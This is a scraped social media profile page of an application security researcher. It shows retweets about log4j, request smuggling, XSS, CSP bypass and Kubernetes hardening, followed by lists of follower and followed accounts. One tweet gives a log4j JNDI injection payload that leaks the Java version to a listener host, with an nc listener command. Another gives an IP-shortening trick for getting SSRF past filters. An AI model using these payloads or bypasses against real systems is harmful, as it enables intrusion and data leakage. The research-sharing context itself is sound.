roguesecurity @_roguesecurity
Application Security, Microservices, Kubernetes, Cloud, IoT, Golang and more .... roguesecurity.in India Joined December 2013-
Tweets138
-
Followers68
-
Following188
-
Likes759
@1ns0mn1h4ck The videos are now available on YouTube! - "Two Bugs To Rule Them All: Taking Over The PHP Supply Chain" by @swapgs: youtube.com/watch?v=RLcK0k… - "A Common Bypass Pattern To Exploit Modern Web Apps" by @scannell_simon: youtube.com/watch?v=V-DdcK…
If you need log4j PoC for Information disclosure ${jndi:ldap://host:1389/${java:version}} echo -e '0\x0c\x02\x01\x01a\x07\x0a\x01\x00\x04\x00\x04\00' | nc -vv -l -p 1389 | xxd
🔥Check out the @owasp Virtual Trainings for 2021🔥 🕸️Hacking Modern Web apps #NodeJS 📳Hacking #Android & IoT apps by Example 📱Hacking #iOS & IoT apps by Example Real world apps & case studies! training.owasp.org/schedule/
Checklist for securing the Kubernetes cluster roguesecurity.in/2020/03/11/att… #Kubernetes #security #Pentesting
New video about the suidbash challenge from the Google CTF Finals 2019. It's about an actual zero-day in /bin/bash - CVE-2019-18276 🔴 youtube.com/watch?v=-wGtxJ…
Windows #UAC isn't a favorite feature, but @HexKitchen details a bug submitted by Eduardo Braun Prado that shows how you can use it to escalate from guest to SYSTEM (includes video) bit.ly/2QyFQPJ
This request smuggling vulnerability in a US Department of Defence system is a solid example of the multiple-frontend problem: hackerone.com/reports/526880
Looking for a video on a specific topic? Check out ippsec.rocks - Searches all the descriptions on my channel and provides links to the exact time in the video! Now with live multi-word searching. Source code is up on my github if you want to learn some JS.
We've published new HTTP desync techniques, tooling and patches in HTTP Desync Attacks: what happened next, by @albinowax portswigger.net/research/http-…
One XSS cheatsheet to rule them all | PortSwigger Research portswigger.net/research/one-x…
CVE-2019-16276: HTTP Request Smuggling in Golang groups.google.com/forum/m/#!topi…
Learn how to write fuzzers for Chrome and put your vulnerability rewards on autopilot with @Dor3s and @NedWilliamson: security.googleblog.com/2019/07/chrome…
Abusing Nashorn Script Engine to perform Remote Code Execution roguesecurity.in/2019/07/27/nas… #nashorn #rce #javascript #java #reflection
I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. #infosec #bugbounty #bugbountytip
Blog post: Bypassing CSP with policy injection by @garethheyes portswigger.net/blog/bypassing…
Our Google I/O #io19 slides are online now: Securing Web Apps with Modern Platform Features by @arturjanc and @we1x. speakerdeck.com/lweichselbaum/…
Blog post: Abusing jQuery for CSS powered timing attacks by @garethheyes portswigger.net/blog/abusing-j…
Blog post: XSS without parentheses and semi-colons by @garethheyes portswigger.net/blog/xss-witho…

Delores @delores33pfeil
298 Followers 3K Following
Kevin Sidwar @KevinSidwar
435 Followers 172 Following Creator of Deploy the Fleet. Obsessed with ESP32 and Internet of Things. Diehard @capitals fan.
Shofe Miraz @shmi012
124 Followers 753 Following Security Consultant/Researcher Passionate about technology, privacy and security. Always on the lookout for the next challenge. https://t.co/4PGWoDWeqL
nks0ne @nks0ne
532 Followers 2K Following it security analyst / security engineer - breaking stuff, building stuff, chillin', it security, dfir, dnb, reverse engineering
Incredity @increditytech
93 Followers 459 Following Build More, Trust Less: discover context-aware security issues and control your open-source software usage in seconds rather than months
Jeremy Chisamore @Chazb0t
2K Followers 1K Following I accidentally the whole thing. https://t.co/xQ62IkJwgK
Marc Nimmerrichter @nimmerrichterm
119 Followers 134 Following Managing Partner at Certitude Consulting (@Cert_it_ude) tweeting about Cyber Security / I use @marcnimm for non-professional matters.
I_am_Bishal @C15C01337
1K Followers 3K Following Security Research Engineer 💂 Founder of CTF Team: Hack@Sec 🇳🇵 Crypto and Web w/@hackasec 🕸️ Blackhat MEA 2023/24 CTF Finalist 🎩 BBH at Hacker0x01 🐞🇳🇵
wtm @wtm_offensi
3K Followers 997 Following Security researcher, bug bounty hunter, owner at Offensi. My tweets are those of my employer.
S0ftS3c @S0ftS3c
172 Followers 5K Following
ilker @_____ilker_____
68 Followers 948 Following
Wendel @ryanwendel
299 Followers 457 Following Always with the baby steps... My idiocy is my own. #infosec #aws #linux #containers
Imroz Security @ImrozSecurity
1K Followers 3K Following We make your web application more secure! @gkhck_
Ankur @kernelm0de
444 Followers 471 Following
Maina Mathenge @Geshma
467 Followers 4K Following IT enthusiast, passionate about RF, cyber security, Cryptocurrency and AI
razor_shifty @RazorShifty
82 Followers 644 Following
Shesha @security_sesha
2K Followers 3K Following Speaker | Trainer - AppSec | OSWE | OSCP | CISSP. Tweets or likes are my bookmarks to access those on PC, mobile or in transit. https://t.co/pzKHcVpNhD
deepak @deepak81391160
1 Followers 3 Following
TrailRacer @trailracer1
2 Followers 147 Following
M007 @heiye007
404 Followers 6K Following
Nutthkr @nutthkr_ifp
26 Followers 2K Following
Victor Voorhees @Codakv00r
259 Followers 4K Following
ferran 🌾 @ferniva96
99 Followers 536 Following
مُعاذ القري... @1411sm
86 Followers 2K Following اللهم علمنا ما ينفعنا، وانفعنا بما علمتنا وزدنا علماً
Marty Dusek @madusec
911 Followers 5K Following #cybersecurity, #infosec, #pentesting, #CTF, #bugbounty, #bugbountytips, #OSCP, #OSCE, #hackerone, #bugcrowd, #HackTheBox, #offensivesecurity, #TryHackMe
The Turtle Moves @Scumble_lover
520 Followers 2K Following Current status: infosec noob with dreams of OSCP one day. This is predominantly a note/study tracker so don't expect amazing quips or lightspeed progress.
D4lj337 @D4lj337
34 Followers 495 Following
David Thor johnson @idaman22
443 Followers 1K Following
Sathish Kumar @sathish211
975 Followers 1K Following OSCP, CRTE, SLAE, CTF Player @hackthebox_eu : https://t.co/utG4sXwXrH
SmartIdeas01 @SmartIdeas01
190 Followers 747 Following
Mr.Doel @xMrDoel
2K Followers 1K Following
Maha krishnan @mahakrishnan005
60 Followers 371 Following Wanderer, Linux lover, Security Enthusiast, ❤️ Opensource
Aakash Choudhary @LearnerHunter
3K Followers 3K Following Dedicate to learn new things and sharing my knowledge SRT Member
Amit Vitekar @r00tb3
418 Followers 3K Following Telecom(xG's) & IoT security. Rail buff / Railfan, Student of the Vedas & Vedanga - Jyotish Shastra(Vedic Astronomy & Astrology).
Mukesh Kumar @hack_logic
93 Followers 2K Following Lead Security Engineer | SRT Member |OSCP | CREST CPSA | CREST CRT | eWAPTX | CEH | ISO 27001 | CISC
Crispler Lab @crisplerlab
2 Followers 0 Following Talks about tech, software & hardware security, electronics, personal development and anything brewing in my mind in crisp, easy and engaging terms.
Al ツ @viuleeenz
257 Followers 244 Following Sr. Reverse Engineer & Malware Analyst @Cleafy | Threat Hunting | Threat Intel
OpenSecurityTraining2 @OpenSecTraining
9K Followers 17 Following 501(c)3 Nonprofit providing Open Source and Open Access computer security training material. #OST2 re-launched July 2021! [email protected]
Christopher @Kharosx0
3K Followers 2K Following Founder @signal_labs : https://t.co/8grJlb5jwZ 🇦🇺 Vulnerability researcher (MORSE) @Microsoft Discord: Kharosx0
exploits.club @exploitsclub
2K Followers 110 Following A VR, RE, and Exploit Dev weekly newsletter | Join the club Contact: [email protected]
chompie @chompie1337
83K Followers 1K Following hacker, weird machine mechanic, X-Force Offensive Research (XOR)
Alisa Esage Шевч�... @alisaesage
38K Followers 101 Following Independent Hacker & Researcher, Owner of Zero Day Engineering @zerodaytraining • Pronounced ‘is edge’
Florian Roth ⚡️ @cyb3rops
206K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
BINARLY🔬 @binarly_io
4K Followers 428 Following ⛓️Binarly is the world’s most advanced automated software supply chain security platform.
Alexandre Borges @ale_sp_brazil
28K Followers 147 Following Vulnerability Researcher and Exploit Developer.
Alexandru "sickness" ... @_sickn3ss_
6K Followers 459 Following Him / He. Security Researcher & Lead Content Developer at Offensive Security. Advanced Windows Exploitation (AWE) author. @[email protected]
Andrej Karpathy @karpathy
1.4M Followers 1K Following Building @EurekaLabsAI. Previously Director of AI @ Tesla, founding team @ OpenAI, CS231n/PhD @ Stanford. I like to train large deep neural nets.
lcamtuf @lcamtuf
38K Followers 498 Following Substack: https://t.co/yFvmNisGW3 Homepage: https://t.co/iFAXZxCO5H
h0mbre @h0mbre_
15K Followers 641 Following # Exploit Reliability Engineer # Developing a full-system snapshot fuzzer: https://t.co/mfVXhwoGYD # Avi: https://t.co/3fsQfVprCf
Clint Gibler @clintgibler
22K Followers 563 Following 🗡️ Head of Security Research @semgrep 📚 Creator of https://t.co/xwtIAI0CuJ newsletter
George Hotz 🌑 @realGeorgeHotz
300K Followers 204 Following President @comma_ai. Founder @__tinygrad__
Paul Vixie @paulvixie
10K Followers 317 Following AWS Security, Farsight Security, SIE Europe, DNSDB, DEC, PAIX, MAPS, MIBH, Abovenet/MFN, ISC, BIND, Cron, BSD, DNS
hextree.io @hextreeio
8K Followers 2 Following 🌱 Grow your cybersecurity skills with concise and well-edited video courses - in early-access, sign-up now! Created by @LiveOverflow and @ghidraninja.
WorldofAI @intheworldofai
6K Followers 148 Following In The World of AI is a captivating YouTube channel that explores the fascinating world of Artificial Intelligence (AI), Machine Learning, LLMs, & etc.
Travis Goodspeed @travisgoodspeed
26K Followers 4K Following Merchant of Dead Trees and Licensed Proselytizer of the Gospel of the Weird Machines with Pwnage, PoC, and Secular Rock.
Brutal Mindset @BrutalMindset
203K Followers 80 Following Unleashing the power of a brutal mindset to conquer self-doubt and reach new heights - τ/acc
j3ssie (Ai Ho) @j3ssiejjj
4K Followers 1K Following A passionate security engineer and creator of @OsmedeusEngine, Metabigor, and Jaeles.
Simon Scannell @scannell_simon
3K Followers 501 Following Cloud Vulnerability Research @ google. Opinions are my own
Anthony Weems @amlweems
3K Followers 270 Following Cloud Vulnerability Research • The opinions stated here are my own, not those of my company.
Alvaro Muñoz 🇺�... @pwntester
13K Followers 514 Following Security Researcher with @XBOW. CTF #int3pids. Opinions here are mine! bluesky: https://t.co/9HRRzpBECt
LunaSec (@lunasec@inf... @LunaSecIO
3K Followers 177 Following Want to network with other InfoSec professionals? Come join our community on Discord! https://t.co/NfFVJREjqo
Synacktiv @Synacktiv
20K Followers 271 Following Offensive security company. Dojo of many ninjas. Red teaming, reverse engineering, vuln research, dev of security tools and incident response.
Jabs @CyberSnark
10K Followers 5K Following OT Cybersecurity Lead @STVGroup. Nonresident Fellow @AtlanticCouncil. Adjunct Professor. Advisor. Sanity evangelist. For Mt. Weather.
Kevin Sidwar @KevinSidwar
435 Followers 172 Following Creator of Deploy the Fleet. Obsessed with ESP32 and Internet of Things. Diehard @capitals fan.
NewAE Technology Inc @newaetech
3K Followers 1K Following Please follow us @newae.com (BSky) for updates and more information.
codemonkey0 @codemonkey0
31 Followers 158 Following Stuart Patterson a.k.a. codmonkey0 Just me doing my thing, moving electrons from one place to another...
Nuclei by ProjectDisc... @pdnuclei
36K Followers 184 Following Nuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
nks0ne @nks0ne
532 Followers 2K Following it security analyst / security engineer - breaking stuff, building stuff, chillin', it security, dfir, dnb, reverse engineering
Sector 7 @sector7_nl
1K Followers 2 Following Sector 7 is the security research division of @Computest
Bad Sector Labs @badsectorlabs
8K Followers 503 Following Cybersecurity news, techniques, exploits, and tools every week at https://t.co/UgKmeEEjIV 🐘 @[email protected]
Security Journey @SecurityJourney
1K Followers 1K Following AppSec education for developers and everyone in the SDLC
Bishop Fox @bishopfox
26K Followers 4K Following A leading provider of #offensivesecurity solutions & contributor to the #infosec community. #pentesting #hacking VC @forgepointcap @carrickcapital @WestCap8
Keysight Device Secur... @Riscure
6K Followers 61 Following Riscure Security Solutions, a Keysight Technologies device security research lab. Specialized in evaluating the security of embedded systems.
IoT Village @IoTvillage
14K Followers 834 Following The place for #iot hacking, workshops, talks, and contests. Organized by: @ISEsecurity
FOSSASIA @fossasia
8K Followers 599 Following Developing #FOSS #OpenSource with a global community + organizing events @eventyay @pslabio. Founded by @hpdang @mariobehling
William (Bill) Kenned... @goinggodotnet
25K Followers 304 Following ⌯Go: Walking the line between correctness and comprehension ⦁ [email protected] ⦁ Adv(@predictionguard) ⦁ Wife(@aleintech) ⦁ NPO(@golangbridge) ⦁ GMT-4(MIA)
LearnKube @learnk8s
89K Followers 31 Following Broaden your Kubernetes expertise with a curated feed of news, articles and best practices. Mastodon: [email protected]